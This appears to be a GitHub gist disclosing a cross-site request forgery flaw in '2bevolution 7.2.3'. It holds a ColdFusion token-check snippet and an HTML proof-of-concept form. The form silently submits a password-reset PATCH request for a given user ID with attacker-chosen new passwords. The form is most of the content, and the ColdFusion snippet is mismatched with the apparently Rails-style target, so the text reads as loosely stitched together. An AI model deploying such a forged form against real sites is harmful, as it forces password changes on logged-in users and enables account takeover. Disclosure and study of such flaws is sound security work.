-
-
Save stacksmasher007/76514ab2b782fb4383f1121e6fc19241 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| There is a Cross-Site Request Forgery (CSRF) on 2bevolution version 7.2.3 attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. This occurs because web browsers automatically include most credentials with each request, such as session cookies, basic authentication header, IP address, and client side SSL certificates. | |
| <cfif NOT StructIsEmpty(form) > | |
| <cfif NOT CSRFverifyToken(form.token)> | |
| <cfabort showerror="Invalid Token" /> | |
| </cfif> | |
| <cfoutput><p>Hello, #EncodeForHTML(form.name)#</p></cfoutput> | |
| </cfif> | |
| <html> | |
| <body> | |
| <form action="https://localhost/users/59215b8f0ec7c37a4ca27b00/password_reset" method="POST"> | |
| <input type="hidden" name="utf8" value="✓" /> | |
| <input type="hidden" name="_method" value="patch" /> | |
| <input type="hidden" name="old_password" value="phew phew" /> | |
| <input type="hidden" name="password" value="qweqji" /> | |
| <input type="hidden" name="password_confirmation" value="qweqji" /> | |
| <input type="submit" value="Submit request" /> | |
| </form> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment